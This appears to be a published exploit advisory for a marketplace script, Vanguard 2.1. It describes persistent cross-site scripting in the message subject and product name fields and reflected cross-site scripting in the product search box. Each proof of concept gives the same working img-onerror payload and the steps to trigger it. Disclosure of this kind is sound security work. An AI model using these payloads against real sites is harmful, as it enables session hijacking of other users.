Vanguard 2.1 Cross Site Scripting

Vanguard version 2.1 suffers from multiple cross site scripting vulnerabilities.


MD5 | affaaefc0f4549a9c786b4ba2a2a814c

# Exploit Title: Vanguard 2.1  Multi XSS Vunlerabilities
# Google Dork:N/A
# Date: 2020-04-04
# Exploit Author: @ThelastVvV
# Vendor Homepage: https://codecanyon.net/item/vanguard-marketplace-digital-products-php/20287975
# Version: 2.1
# Tested on: 5.4.0-4parrot1-amd64

---------------------------------------------------------


Summary:

Persistent Cross-site Scripting in message&product title-tags also there's Non-Persistent Cross-site scripting in product search box.

PoC 1:

A- Message

1- create an account on vanguard marketplace
2- go to send mail
https://example/mails/new

In the "Object" field type my my preferred payload : "><img src=x onerror=prompt(document.domain);>

3-then choose the target (username ) then hit submit
4- now go to the mailbox and click on the msg
https://example/mails/read/1

et voila xssed!

PoC 2:

B:Product

1-go to add new product
2- In the "Product Name" field type my my preferred payload : "><img src=x onerror=prompt(document.domain);>
2- now view the product page
https://example/p/(id)
3 -click on download in the product page
https://example/download/(id)

et voila xssed!

PoC 3:

In Products Search box use payload:
"><img src=x onerror=prompt(document.domain);>


Impact:
XSS can lead to user's Session Hijacking, and if used in conjunction with a social engineering attack it can also lead to disclosure of sensitive data, CSRF attacks and other critical attacks on all users of the product .

Screentshoots:

A -https://imgur.com/jkCfaEh
B-https://imgur.com/3GuKGJr


Related Posts